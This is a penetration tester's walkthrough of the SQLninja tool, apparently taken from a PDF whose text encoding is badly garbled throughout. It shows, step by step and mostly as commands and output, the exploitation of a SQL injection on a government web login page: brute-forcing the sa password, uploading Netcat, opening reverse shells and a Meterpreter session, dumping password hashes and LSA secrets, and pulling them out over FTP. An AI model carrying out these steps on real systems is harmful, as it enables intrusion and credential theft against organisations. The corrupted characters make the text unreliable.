D 01

SQLNINJA
From the site:

Sqlninja is a tool targeted to exploit SQL Injection vulnerabilities on a eb application that uses
!icroso"t SQL Server as its bac#$end% Its main goal is to provide a remote access on the
vulnerable &' server( even in a ver) hostile environment% It should be used b) penetration
testers to help and automate the process o" ta#ing over a &' Server hen a SQL Injection
vulnerabilit) has been discovered%
SQLNinja *http:++sqlninja%source"orge%net+index%html,
&emo *http:++sqlninja%source"orge%net+sqlninjademo%html,
&ocumentation *http:++sqlninja%source"orge%net+sqlninja$hoto%html,
-hat more than sums up hat the tool is used "or% -his document ill go into the experiences I have
had using the tool success"ull) during a penetration test% -he results shon are real orld examples
ith the sensitive in"ormation scrubbed to protect the innocent% -his document ill also deal ith
installation o" SQLninja on an .buntu /%01 L-S 2ard) 2eron S)stem%
SQLNinja is a perl script that requires a number o" perl libraries to "unction properl)% I installed these
libraries using 34AN *%cpan%org,% -he use o" 34AN is outside the scope o" this document%
#perl MCPAN e install NetPacket
#apt-get install libpcap0.8 libpcap0.8-dev
#perl MCPAN e install Net::Pcap
#perl MCPAN e install Net::DN
#perl MCPAN e install Net::!a"#P
#perl MCPAN e install #$::%cket::&
#"get 'ttp:((d%"nl%ads.s%)rce*%rge.net(s+lnin,a(s+lnin,a-0.-..-r/.tg0
#tar 01v* s+lnin,a-0.-..-r/.tg0
#cd s+lnin,a-0.-..-r/
First thing )ou ill ant to do is run a test against )our target% I" )ou do not have a sqlninja%con" "ile
"rom a previous test in the "older )ou ill be as#ed "or in"ormtion regarding the target to create the
con"iguration "ile so an attac# can be conducted%
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# .(s+lnin,a -4 test
+lnin,a rel. 0.-..-r/
C%p5rig't 6C7 -008--008 ices)r*er 9r00t2n%rt'ern*%rtress.net:
;-< s+lnin,a.c%n* d%es n%t e1ist. =%) "ant t% create it n%" > ;5(n<
: 5
;?< Creating a ne" c%n*ig)rati%n *ile. @eep in 4ind t'at %nl5 basic %pti%ns
"ill be generatedA and t'at t'e *ile s'%)ld be 4an)all5 edited *%r
advanced
%pti%ns and *ine t)ning.
;/(/0< Bicti4 '%st 6e.g.: """.victi4.c%47:
: state.g%vt.agenc5.)s
;-(/0< !e4%te p%rt ;80<
: CC.
;.(/0< Dse & 65(n(a)t%7 ;a)t%<
: 5
;C(/0< Met'%d t% )se 6EFG(P$G7 ;EFG<
: P$G
;H(/0< B)lnerable pageA incl)ding pat' and leading slas'
6e.g.: (dir(target.asp7
: (APP&#CAG#$N(I%lder(A)t'enticati%nPage.asp
;8(/0< tart %* t'e e1pl%it string. #t 4)st incl)de t'e v)lnerable para4eter
and t'e c'aracter se+)ence t'at all%"s )s t% start in,ecting c%44ands. #n
general t'is 4eansA at least:
- an ap%str%p'e 6i* t'e para4eter is a string7
- a se4ic%l%n 6t% end t'e %riginal +)er57
#t 4)st als% incl)de ever5t'ing necessar5 t% pr%perl5 cl%se t'e %riginal
+)er5A
as an appr%priate n)4ber %* cl%sing brackets. D%nJt *%rget t% D!&-enc%deA
"'ere needed 6e.g.: spaces7.
I%r instanceA i* "e c%nsider t'e *%ll%"ing GK& c%44and:
e1ec 4aster..1pLc4ds'ell Jdir c:MJ
and t'e string t% in,ect is t'e *%ll%"ing:
aaaN/ObbbN1JPe1ec?4aster..1pLc4ds'ell?Jdir?c:J
t'is para4eter s'%)ld l%%k like t'is:
aaaN/ObbbN1JP
: )b4itN)b4itOPass"%rdNp"nedODserNa4eNa)dit%rJ
;Q(/0< #* 5%) need t% add s%4e 4%re para4eters a*ter t'e v)lnerable %neA p)t
t'e4 'ere 6d%nJt *%rget t'e leading ROR sign and t% D!&-enc%de "'ere needed7.
e.g.: Opara4.Naaa
:
;8(/0< &%cal '%st: 5%)r #P address 6*%r backscan and revs'ell 4%des7
: /S-./88.0./
;S(/0< #nter*ace t% sni** "'en in backscan 4%de
: et'0
;/0(/0< Fvasi%n tec'ni+)es. P%ssible c'%ices are:
/ - K)er5 'e1-enc%ding
- - C%44ents as separat%rs
. - !and%4 case
C - !and%4 D!# enc%ding
All tec'ni+)es can be c%4binedA s% *%r instance 5%) can enter R/-.CR 6"it'%)t
+)%tes7. T%"everA keep in 4ind t'at )sing t%% 4an5 tec'ni+)es at %nce leads t%
ver5 l%ng +)eriesA t'at 4ig't create pr%ble4s "'en )sing EFG.
De*a)lt: 0 6n% evasi%n7
:
;?< s+lnin,a.c%n* "ritten s)ccess*)ll5
;?< Parsing c%n*ig)rati%n *ile................
;?< Garget is: state.g%vt.agenc5.)s
;?< Gr5ing t% in,ect a J"ait*%r dela5J....
;?< #n,ecti%n "as s)ccess*)lU &etJs r%ck UU :7
In this particular instance the SQL Injection vulnerabilit) is in the login page o" the application% A"ter )ou
have con"irmed that SQL Injection is possible and SQLNinja is con"igured correctl) )ou can begin
"ingerprinting the bac#end database%
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# .(s+lnin,a -4 *ingerprint
V'at d% 5%) "ant t% disc%ver >
0 - Database versi%n 6-000(-00H7
/ - Database )ser
- - Database )ser rig'ts
. - V'et'er 1pLc4ds'ell is "%rking
C - V'et'er 4i1ed %r Vind%"s-%nl5 a)t'enticati%n is )sed
a - All %* t'e ab%ve
' - Print t'is 4en)
+ - e1it
: 0
;?< C'ecking K& erver versi%n...
Garget: Micr%s%*t K& erver -000
: /
;?< C'ecking "'et'er "e are s5sad4in...
N%A "e are n%t JsaJ.... :(
;?< Iinding db)ser lengt'...
E%t it U &engt' N //
;?< N%" g%ing *%r t'e c'aracters........
DW Dser is....: APP&#CAG#$N
: -
;?< C'ecking "'et'er )ser is 4e4ber %* s5sad4in server r%le....
=%) are n%t an ad4inistrat%r. #* 5%) tried escalating alread5A it 4ig't be
t'at 5%) are )sing %ld $DWC c%nnecti%ns. C'eck t'e d%c)4entati%n
*%r '%" t% deal "it' t'is
: .
;?< C'ecking "'et'er 1pLc4ds'ell is available
1pLc4ds'ell d%esnJt see4 t% be available
: C
Mi1ed a)t'enticati%n see4s t% be )sed
: +
5e are not the sa *!SSQL Administrator, user but instead are the user A44LI3A-I6N and do not have
administrative rights on the database% 4lease see another tutorial I have created "or the SQL Injection
tool automagic on ho to extract the data "rom the database ith the user A44LI3A-I6N% -he "act that
the database uses !ixed authentication mode allos us to conduct a dictionar) attac# to identi") the sa
passord%
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# .(s+lnin,a -v -4 br)te*%rce -"
pass.t1t
- T%st: state.g%vt.agenc5.)s
- P%rt: CC.
- &: 5es
- 4et'%d: P$G
- page: (APP&#CAG#$N(I%lder(A)t'enticati%nPage.asp
- stringstart: )b4itN)b4itOPass"%rdNp"nedODserNa4eNa)dit%rJ
- stringend:
- l%cal '%st: /S-./88.0./
- sni** device: et'0
- d%4ain: s+lnin,a.net
;v< & c%nnecti%n *%rced
;?< V%rdlist 'as been speci*ied: )sing dicti%nar5-based br)te*%rce
N)4ber %* c%nc)rrent pr%cesses ;4in:/ 4a1:/0 de*a)lt:.<
: /
;v< Creating DN#X s%cket *%r c'ildren 4essages
;v< &a)nc'ing c'ildren pr%cesses
;?< Wr)te*%rcing t'e sa pass"%rd. G'is 4ig't take a "'ile
dba pass"%rd is...: serverna4e
br)te*%rce t%%k 80 sec%nds
;?< Gr5ing t% add c)rrent )ser t% s5sad4in gr%)p
;?< D%neU Ne" c%nnecti%ns "ill be r)n "it' ad4inistrative privilegesU #n case
t'e server )ses $DWCA 5%) 4ig't 'ave t% "ait a little bit
6c'eck s+lnin,a-'%"t%.'t4l7
As )ou can see "rom the results the sa passord as the name o" the server% -is#( tis#7 SQLninja does
not have a chec# "or the name o" the server )ou are attac#ing% I obtained this b) running a manual
quer) against the application%
and / in 6select 22serverna4e7--
Micr%s%*t $&F DW Pr%vider *%r $DWC Drivers err%r J800C0e0QJ
;Micr%s%*t<;$DWC K& erver Driver<;K& erver<5nta1 err%r c%nverting t'e
nvarc'ar val)e JF!BF!NAMFJ t% a c%l)4n %* data t5pe int.
(APP&#CAG#$N(I%lder(A)t'enticati%nPage.aspA line .8
5e ill run the "ingerprint option again to con"irm that e are a database administrative user and to
see i" xp8cmdshell is enabled%
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# .(s+lnin,a -4 *ingerprint
V'at d% 5%) "ant t% disc%ver >
0 - Database versi%n 6-000(-00H7
/ - Database )ser
- - Database )ser rig'ts
. - V'et'er 1pLc4ds'ell is "%rking
C - V'et'er 4i1ed %r Vind%"s-%nl5 a)t'enticati%n is )sed
a - All %* t'e ab%ve
' - Print t'is 4en)
+ - e1it
: -
;?< C'ecking "'et'er )ser is 4e4ber %* s5sad4in server r%le....
=%) are an ad4inistrat%r U
: .
;?< C'ecking "'et'er 1pLc4ds'ell is available
1pLc4ds'ell see4s t% be available :7
: +
5e are a database administrator and xp8cmdshell is available as is the de"ault "or !icroso"t SQL Server
9000% .sing the SQL Injection vulnerabilit) and xp8cmdshell e can upload a "ile provided b) SQLNinja%
-he "ile provided is Net3at *nc%exe as nc%scr, that has been pre$parsed b) a provided perl script so that it
can be uploaded line b) line b) the sql injection vulnerabilit)% 6nce uploaded the Net3at program is put
bac# together b) the debug%exe command "ound on the host%
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# .(s+lnin,a -4 )pl%ad
Iile t% )pl%ad:
s'%rtc)ts: /Nscripts(nc.scr -Nscripts(dnst)n.scr
: /
;?< Dpl%ading scripts(nc.scr deb)g script............
/HC0(/HC0 lines "ritten
d%ne U
;?< C%nverting script t% e1ec)table... 4ig't take a "'ile
;?< C'ecking "'et'er nc.e1e is t'ere...
;?< nc.e1e see4s t% be t'ere... en,%5U :7
-he database server did not have anti$virus so"tare installed so the upload o" Net3at as success"ul%
2oever( i" the server did have anti$virus installed there is a document that can be "ound online on ho
to ta#e bac# Net3at *%pac#etstormsecurit)%org+papers+virus+-a#ing8'ac#8Netcat%pd",% :ou can
ta#e )our modi"ied Net3at executable and create the necessar) script to be uploaded b) SQLNinja using
a perl script provided ith the utilit)% -hat script( ma#escr%pl( "ound in the root o" the SQLNinja "older
ta#es the exe and produces the proper scr "ile that can be uploaded b) the SQL Injection vulnerabilit)
and put bac# to the original exe on the host using the debug%exe command%
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# .(4akescr.pl
s+lnin,a deb)g script generat%r
C%p5rig't 6C7 -008 ices)r*er 9r00t2n%rt'ern*%rtress.net:
Dsage: .(4akescr.pl -i 9inp)t *ile: ;-% 9%)tp)t *ile:<
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# .(4akescr.pl -i nc.edge.e1e -% nc.scr
Deb)g script created s)ccess*)ll5
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# 4v scripts(nc.scr scripts(nc.scr.sv
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# 4v nc.scr scripts
Just upload the ne Net3at script% 6nce the script is uploaded )ou can then use the SQLNinja bac#scan
option to "ind an open port that the SQL server communicates out to the internet ith% 2oever( "or
me this did not or# so please rel) on the demo "ound on the SQLNinja ebsite "or ho the command
or#s% I manuall) tried three o" the most common ports that a server ould communicate out to the
internet ith *udp ;<( tcp /0( = tcp 11<,% 5e ill no create a reverse shell bac# to our host%
r%%t2edge-lin)1pen:3(Deskt%p(s+lnin,a-0.-..-r/# .(s+lnin,a -v -4 revs'ell
- P%rt: CC.
- &: 5es
- 4et'%d: P$G
- stringstart: )b4itN)b4itOPass"%rdNp"nedODserNa4eNa)dit%rJ
- stringend:
- l%cal '%st: /S-./88.0./
;v< tarting revs'ell 4%d)le
&%cal p%rt: CC.
tcp()dp ;de*a)lt: tcp<: tcp
;v< tarting listener pr%cess
;v< Creating l%cal listening tcp s%cket
;?< "aiting *%r s'ell %n p%rt CC.(tcp...
Micr%s%*t Vind%"s -000 ;Bersi%n H.00.-/SH<
6C7 C%p5rig't /S8H--000 Micr%s%*t C%rp.
C:MV#NNGMs5ste4.-:"'%a4i
"'%a4i
F!BF!NAMFMAd4inistrat%r
:ou have success"ull) ta#en over the bac#end database server using a SQL Injection vulnerabilit) "ound
in a eb application> 'elo is hat I did to aquire the passord hashes on the server so I can crac#
some passords and hope"ull) dig "urther into the agenc)% -he "irst thing e need to do is get the
45&ump? application uploaded to the server% I create the necessar) scripts to be uploaded using the
perl script provided%
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# .(4akescr.pl -i PVD)4pX.e1e -%
PVD)4pX.scr
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# 4v PVD)4pX.scr scripts
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# .(4akescr.pl -i D)4pvc.e1e -%
D)4pvc.scr
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# 4v D)4pvc.scr scripts
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# .(4akescr.pl -i D)4pF1t.dll -%
D)4pF1t.scr
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# 4v D)4pF1t.scr scripts
I then upload them using SQLNinja
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# .(s+lnin,a -v -4 )pl%ad
- P%rt: CC.
- &: 5es
- 4et'%d: P$G
- stringstart: )b4itN)b4itOPass"%rdNp"nedODserNa4eNa)dit%r
- stringend:
- l%cal '%st: /S-./88.0./
Iile t% )pl%ad:
: scripts(D)4pvc.scr
;v< tarting )pl%ad 4%d)le
;v< Deleting an5 previ%)s instance %* t'e *ile...
;?< Dpl%ading scripts(D)4pvc.scr deb)g script............
888(./;-< Varning... t'e server resp%nded "it' TGGP(/./ H00 #nternal erver
Frr%r
C'eck c%n*ig)rati%nA as t'ings 4ig't n%t be "%rking as e1pected U
./8C(./8C lines "ritten
d%ne U
;v< C'ecking n)4ber %* )pl%aded lines
;v< D)4pvc.scr see4s t% 'ave been pr%perl5 )pl%aded
;v< !e4%ving t'e %riginal scr *ile
;?< C'ecking "'et'er D)4pvc.e1e is t'ere...
;?< D)4pvc.e1e see4s t% be t'ere... en,%5U :7
- P%rt: CC.
- &: 5es
- 4et'%d: P$G
- stringend:
- l%cal '%st: /S-./88.0./
Iile t% )pl%ad:
: scripts(PVD)4pX.scr
;?< Dpl%ading scripts(PVD)4pX.scr deb)g script............
.SS0(.SS0 lines "ritten
d%ne U
;v< PVD)4pX.scr see4s t% 'ave been pr%perl5 )pl%aded
;?< C'ecking "'et'er PVD)4pX.e1e is t'ere...
;?< PVD)4pX.e1e see4s t% be t'ere... en,%5U :7
- P%rt: CC.
- &: 5es
- 4et'%d: P$G
- stringend:
- l%cal '%st: /S-./88.0./
Iile t% )pl%ad:
: scripts(D)4pF1t.scr
;?< Dpl%ading scripts(D)4pF1t.scr deb)g script............
.Q-S(.Q-S lines "ritten
d%ne U
;v< D)4pF1t.scr see4s t% 'ave been pr%perl5 )pl%aded
;?< C'ecking "'et'er D)4pF1t.e1e is t'ere...
;?< D)4pF1t.e1e see4s t% be t'ere... en,%5U :7
6nce the "iles are uploaded I create a reverse shell connection( rename &ump@xt%exe to &ump@xt%dll
and run 45&ump?% Note( all "iles uploaded b) SQLNinja are placed in the A-@!4A director)%
C:MV#NNGMs5ste4.-:cd YGFMPY
cd YGFMPY
C:MD$CDMF3/MADM#N#3/M&$CA&3/MGe4p:dir
dir
B%l)4e in drive C 'as n% label.
B%l)4e erial N)4ber is 0000-000/
Direct%r5 %* C:MD$CDMF3/MADM#N#3/M&$CA&3/MGe4p
0H(-8(-00S 0Q:0.a 9D#!: .
0H(-8(-00S 0Q:0.a 9D#!: ..
0H(-8(-00S 0Q:0.a .QA.8C D)4pF1t.e1e
0H(-8(-00S 0Q:0/a -CAC00 D)4pvc.e1e
0H(-Q(-00S 0.:0.p .0AQ-0 nc.e1e
0H(-8(-00S 0Q:0.a .-A8/. PVD)4pX.e1e
1 Iile6s7 111A111 b5tes
1 Dir6s7 1A111A111A111 b5tes *ree
C:MD$CDMF3/MADM#N#3/M&$CA&3/MGe4p:4%ve D)4pF1t.e1e D)4pF1t.dll
4%ve D)4pF1t.e1e D)4pF1t.dll
C:MD$CDMF3/MADM#N#3/M&$CA&3/MGe4p:p"d)4p1
p"d)4p1
PVD)4pX v/.C Z 'ttp:((reedarvin.t'earvins.c%4(
Dsage: PVD)4pX ;-clp'< 9'%stna4e Z ip inp)t *ile: 9)serna4e: 9pass"%rd:
;-clp'< -- %pti%nal arg)4ent
9'%stna4e Z ip inp)t *ile: -- re+)ired arg)4ent
9)serna4e: -- re+)ired arg)4ent
9pass"%rd: -- re+)ired arg)4ent
-c -- D)4p Pass"%rd Cac'e
-l -- D)4p &A ecrets
-p -- D)4p Pass"%rd Tas'es
-' -- D)4p Pass"%rd Tist%r5 Tas'es
#* t'e 9)serna4e: and 9pass"%rd: arg)4ents are b%t' pl)s signs 6?7A t'e
e1isting credentials %* t'e )ser r)nning t'is )tilit5 "ill be )sed.
F1a4ples:
PVD)4pX /0./0./0./0 ? ?
PVD)4pX /0./0./0./0 ad4inistrat%r pass"%rd
PVD)4pX -lp M5Vind%"sMac'ine ? ?
PVD)4pX -lp M5Vind%"sMac'ine ad4inistrat%r pass"%rd
PVD)4pX -clp' #P#np)tIile.t1t ? ?
PVD)4pX -clp' #P#np)tIile.t1t ad4inistrat%r pass"%rd
6Vritten b5 !eed Arvin Z reedarvin2g4ail.c%47
C:MD$CDMF3/MADM#N#3/M&$CA&3/MGe4p:p"d)4p1 -clp' /-Q.0.0./ ? ?
p"d)4p1 -clp' /-Q.0.0./ ? ?
!)nning PVD)4pX v/.C "it' t'e *%ll%"ing arg)4ents:
;?< T%st #np)t: R/-Q.0.0./R
;?< Dserna4e: R?R
;?< Pass"%rd: R?R
;?< Arg)4ents: R-clp'R
;?< # %* G'reads: R8CR
Vaiting *%r PVD)4pX service t% ter4inate %n '%st /-Q.0.0./.
!etrieved *ile /-Q.0.0./-PVCac'e.t1t
!etrieved *ile /-Q.0.0./-&Aecrets.t1t
!etrieved *ile /-Q.0.0./-PVTas'es.t1t
!etrieved *ile /-Q.0.0./-PVTist%r5Tas'es.t1t
At this point the text "iles are created and I just print them to the screen using to more command to
cop) and past the text to m) laptop%
Advanced -echniques
5hile I had access I documented additional a)s that SQLNinja can be used to control a bac#end
database server through SQL Injection% I also documented easier a)s to upload 45&ump? ithout
having to resort to using SQLNinja%
'elo e create an F-4 script and use it to connect to an F-4 server e control% 5e B@- the 45&ump?
program( run it( and 4.- the output to our machine% 3on"iguring an F-4 server is outside the scope o"
this document%
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# .(s+lnin,a -4 revs'ell
&%cal p%rt: 80
tcp()dp ;de*a)lt: tcp<: tcp
;?< "aiting *%r s'ell %n p%rt 80(tcp...
C:MV#NNGMs5ste4.-:cdM
cdM
C:M:ec'% $PFN /S-./88.0./ :: *tp.t1t
ec'% $PFN /S-./88.0./ :: *tp.t1t
C:M:ec'% bin :: *tp.t1t
ec'% bin :: *tp.t1t
C:M:ec'% EFG PVD)4pX.e1e :: *tp.t1t
ec'% EFG PVD)4pX.e1e :: *tp.t1t
C:M:ec'% EFG D)4pvc.e1e :: *tp.t1t
ec'% EFG D)4pvc.e1e :: *tp.t1t
C:M:ec'% EFG D)4pF1t.dll :: *tp.t1t
ec'% EFG D)4pF1t.dll :: *tp.t1t
C:M:ec'% b5e :: *tp.t1t
ec'% b5e :: *tp.t1t
C:M:*tp -A -s:*tp.t1t
*tp -A -s:*tp.t1t
An%n54%)s l%gin s)cceeded *%r Ad4inistrat%r2serverna4e.state.g%vt.agenc5.)s
$PFN /S-./88.0./
bin
EFG PVD)4pX.e1e
EFG D)4pvc.e1e
EFG D)4pF1t.dll
b5e
C:M:dir
dir
Direct%r5 %* C:M
0-(0S(-00S 0H:/8p 9D#!: D%c)4ents and ettings
0H(-S(-00S /0:C/a .QA.8C D)4pF1t.dll
0H(-S(-00S /0:C/a -CAC00 D)4pvc.e1e
0H(-S(-00S /0:.Ha //H *tp.t1t
0H(-Q(-00S 08:.Qa 9D#!: Pr%gra4 Iiles
0H(-S(-00S /0:C/a .-A8/. PVD)4pX.e1e
//(/8(-00H 08:-Ha 9D#!: Ge4p
0H(-Q(-00S 08:.Qa 9D#!: V#NNG
1 Iile6s7 111A111 b5tes
C:M:PVD)4pX.e1e -clp' /-Q.0.0./ ? ?
PVD)4pX.e1e -clp' /-Q.0.0./ ? ?
;?< T%st #np)t: R/-Q.0.0./R
;?< Dserna4e: R?R
;?< Pass"%rd: R?R
Vaiting *%r PVD)4pX service t% ter4inate %n '%st /-Q.0.0./.
C:M:del *tp.t1t
del *tp.t1t
C:M:ec'% $PFN /S-./88.0./ :: *tp.t1t
ec'% $PFN /S-./88.0./ :: *tp.t1t
C:M:ec'% CD *iles :: *tp.t1t
ec'% CD *iles :: *tp.t1t
C:M:ec'% PDG /-Q.0.0./-PVCac'e.t1t :: *tp.t1t
ec'% PDG /-Q.0.0./-PVCac'e.t1t :: *tp.t1t
C:M:ec'% PDG /-Q.0.0./-&Aecrets.t1t :: *tp.t1t
ec'% PDG /-Q.0.0./-&Aecrets.t1t :: *tp.t1t
C:M:ec'% PDG /-Q.0.0./-PVTas'es.t1t :: *tp.t1t
ec'% PDG /-Q.0.0./-PVTas'es.t1t :: *tp.t1t
C:M:ec'% PDG /-Q.0.0./-PVTist%r5Tas'es.t1t :: *tp.t1t
ec'% PDG /-Q.0.0./-PVTist%r5Tas'es.t1t :: *tp.t1t
C:M:ec'% b5e :: *tp.t1t
ec'% b5e :: *tp.t1t
C:M:*tp -A -s:*tp.t1t
*tp -A -s:*tp.t1t
An%n54%)s l%gin s)cceeded *%r Ad4inistrat%r2serverna4e.state.g%vt.agenc5.)s
$PFN /S-./88.0./
CD *iles
PDG /-Q.0.0./-PVCac'e.t1t
PDG /-Q.0.0./-&Aecrets.t1t
PDG /-Q.0.0./-PVTas'es.t1t
PDG /-Q.0.0./-PVTist%r5Tas'es.t1t
b5e
C:M:
!etasploit
-he documentation "or the metasploit option o" SQLNinja explains hat the utilit) does to include
metatsploit "unctionalit)% 4lease read it here *http:++sqlninja%source"orge%net+sqlninja$
hoto%htmlCss9%DD,%
N6-@: 5hen using SQLNinja to upload and launch the !etasploit pa)load I noticed that the SQL
Injection command to run the uploaded pa)load ould ta#e place be"ore !etaploit had enough time to
load% I have no idea i" !etasploit ta#es a hile to load on other users s)stems but in case it does I
modi"ied the SQLNinja code to allo more time to go b) be"ore the SQL Injection command to execute
the pa)load is sent% Lines <<0D$<<0; o" sqlninja contain an i" statement ith some dela) variables% I just
changed them "rom ; to 9; alloing enough time "or !etasploit to load hen it is called b) the script%
r%%t2edge-lin)1pen:3(s+lnin,a-0.-..-r/# .(s+lnin,a -v -4 4etaspl%it
- P%rt: CC.
- &: 5es
- 4et'%d: P$G
- page: (GAAD!A(N%nLC%4plianceLFntr5(GAAD!A&%gin!esp.asp
- stringend:
- l%cal '%st: /S-./88.0./
;?< Fntering Metaspl%it 4%d)le. #n %rder t% )se t'is 4%d)le 5%) need t%
'ave *%)nd an available GCP p%rtA eit'er inb%)nd %r %)tb%)nd
;?< C'ecking Metaspl%it. availabilit5....
;?< V'ic' pa5l%ad 5%) "ant t% )se>
/: Meterpreter
-: BNC
: /
;?< V'ic' t5pe %* c%nnecti%n 5%) "ant t% )se>
/: bindLtcp
-: reverseLtcp
: -
;?< Fnter l%cal p%rt n)4ber
: CC.
;?< C'%%se a pa5l%ad enc%ding 4et'%d
0 - n%ne
/ - Alp'a- Alp'an)4eric Mi1edcase
- - Alp'a- Alp'an)4eric Dppercase
. - Av%id DGI8(t%l%"er
C - Call?C D"%rd X$!
H - ingle-b5te X$! C%)ntd%"n
8 - Bariable-lengt' Instenv(4%v D"%rd X$!
Q - P%l54%rp'ic [)4p(Call X$! Additive Ieedback
8 - N%n-Alp'a
S - N%n-Dpper
/0 - P%l54%rp'ic X$! Additive Ieedback
// - Alp'a- Alp'an)4eric Dnic%de Mi1edcase
/- - Alp'a- Alp'an)4eric Dnic%de Dppercase
: 0
;v< C%44and: ('%4e(edge(tr)nk(4s*pa5l%ad "ind%"s(4eterpreter(reverseLtcp
e1it*)ncNpr%cess lp%rtNCC. l'%stN/S-./88.0./ X : (t4p(4etH/S0.e1e
;?< Calling 4s*pa5l%ad. t% create t'e pa5l%ad...
Created b5 4s*pa5l%ad 6'ttp:((""".4etaspl%it.c%47.
Pa5l%ad: "ind%"s(4eterpreter(reverseLtcp
&engt': -Q8
$pti%ns: e1it*)ncNpr%cessAlp%rtNCC.Al'%stN/S-./88.0./
;?< Pa5l%ad 64etH/S0.e1e7 created. N%" c%nverting it t% deb)g script
;?< Dpl%ading (t4p(4etH/S0.scr deb)g script............
//.(//. lines "ritten
d%ne U
;v< 4etH/S0.scr see4s t% 'ave been pr%perl5 )pl%aded
;?< C'ecking "'et'er 4etH/S0.e1e is t'ere...
;?< 4etH/S0.e1e see4s t% be t'ere... en,%5U :7
;?< C'ecking i* DFP 6Data F1ec)ti%n Preventi%n7 is enabled %n target
;?< N% DFP detected.... g%%d
;v< F1ec)ting: ('%4e(edge(tr)nk(4s*cli 4)lti('andler
pa5l%adN"ind%"s(4eterpreter(reverseLtcp lp%rtNCC. l'%stN/S-./88.0./ F
;?< Grans*erring c%ntr%l t% 4s*cli. Tave *)nU
;\< Please "ait "'ile "e l%ad t'e 4%d)le tree...
;\< Tandler binding t% &T$G 0.0.0.0
;\< tarted reverse 'andler
;\< tarting t'e pa5l%ad 'andler...
;\< Grans4itting inter4ediate stager *%r %ver-si0ed stage...6/S/ b5tes7
;\< ending stage 6-8H0 b5tes7
;\< leeping be*%re 'andling stage...
;\< Dpl%ading D&& 6QHQ8Q b5tes7...
;\< Dpl%ad c%4pleted.
;\< Meterpreter sessi%n / %pened 6/S-./88.0./:CC. -: 111.111.111.111:-CQ8H7
4eterpreter :
4eterpreter : )pl%ad ('%4e(edge(d%"nl%ads(p"d)4p1(D)4pF1t.dll c:M
;\< )pl%ading : ('%4e(edge(d%"nl%ads(p"d)4p1(D)4pF1t.dll -: c:M
;\< )pl%aded : ('%4e(edge(d%"nl%ads(p"d)4p1(D)4pF1t.dll -: c:MMD)4pF1t.dll
4eterpreter : ('%4e(edge(d%"nl%ads(p"d)4p1(D)4pvc.e1e c:M
;-< Dnkn%"n c%44and: ('%4e(edge(d%"nl%ads(p"d)4p1(D)4pvc.e1e.
4eterpreter : )pl%ad ('%4e(edge(d%"nl%ads(p"d)4p1(D)4pvc.e1e c:M
;\< )pl%ading : ('%4e(edge(d%"nl%ads(p"d)4p1(D)4pvc.e1e -: c:M
;\< )pl%aded : ('%4e(edge(d%"nl%ads(p"d)4p1(D)4pvc.e1e -: c:MMD)4pvc.e1e
4eterpreter : )pl%ad ('%4e(edge(d%"nl%ads(p"d)4p1(PVD)4pX.e1e c:M
;\< )pl%ading : ('%4e(edge(d%"nl%ads(p"d)4p1(PVD)4pX.e1e -: c:M
;\< )pl%aded : ('%4e(edge(d%"nl%ads(p"d)4p1(PVD)4pX.e1e -: c:MMPVD)4pX.e1e
4eterpreter : e1ec)te -* c4d -c
Pr%cess SC-8 created.
C'annel 8 created.
4eterpreter : interact 8
#nteracting "it' c'annel 8...
C:MV#NNGMs5ste4.-:cdM
cdM
C:M:dir
dir
Direct%r5 %* C:M
0H(-S(-00S 08:CSa .QA.8C D)4pF1t.dll
0H(-S(-00S 08:CSa -CAC00 D)4pvc.e1e
0H(-S(-00S 08:CSa .-A8/. PVD)4pX.e1e
//(/8(-00H 08:-Ha 9D#!: Ge4p
0H(-Q(-00S 08:.Qa 9D#!: V#NNG
11 Iile6s7 1A111A111 b5tes
C:M:p"d)4p1 -clp' /-Q.0.0./ ? ?
p"d)4p1 -clp' /-Q.0.0./ ? ?
;?< T%st #np)t: R/-Q.0.0./R
;?< Dserna4e: R?R
;?< Pass"%rd: R?R
Vaiting *%r PVD)4pX service t% ter4inate %n '%st /-Q.0.0./..
C:M:dir
dir
Direct%r5 %* C:M
0H(-S(-00S 08:H/a 8AC.8 /-Q.0.0./-&Aecrets.t1t
0H(-S(-00S 08:H/a CH/ /-Q.0.0./-PVCac'e.t1t
0H(-S(-00S 08:H/a 88Q /-Q.0.0./-PVTas'es.t1t
0H(-S(-00S 08:H/a 88Q /-Q.0.0./-PVTist%r5Tas'es.t1t
0H(-S(-00S 08:CSa .QA.8C D)4pF1t.dll
0H(-S(-00S 08:CSa -CAC00 D)4pvc.e1e
0H(-S(-00S 08:CSa .-A8/. PVD)4pX.e1e
//(/8(-00H 08:-Ha 9D#!: Ge4p
0H(-Q(-00S 08:.Qa 9D#!: V#NNG
11 Iile6s7 1A111A111 b5tes
C:M:e1it
e1it
4eterpreter : d%"nl%ad c:MM/-Q.0.0./-&Aecrets.t1t /-Q.0.0./-&Aecrets.t1t
;\< d%"nl%ading: c:M/-Q.0.0./-&Aecrets.t1t -: /-Q.0.0./-&Aecrets.t1t
;\< d%"nl%aded : c:M/-Q.0.0./-&Aecrets.t1t -: /-Q.0.0./-&Aecrets.t1t
4eterpreter : d%"nl%ad c:MM/-Q.0.0./-PVCac'e.t1t /-Q.0.0./-PVCac'e.t1t
;\< d%"nl%ading: c:M/-Q.0.0./-PVCac'e.t1t -: /-Q.0.0./-PVCac'e.t1t
;\< d%"nl%aded : c:M/-Q.0.0./-PVCac'e.t1t -: /-Q.0.0./-PVCac'e.t1t
4eterpreter : d%"nl%ad c:MM/-Q.0.0./-PVTist%r5Tas'es.t1t /-Q.0.0./-
PVTist%r5Tas'es.t1t
;\< d%"nl%ading: c:M/-Q.0.0./-PVTist%r5Tas'es.t1t -: /-Q.0.0./-
PVTist%r5Tas'es.t1t
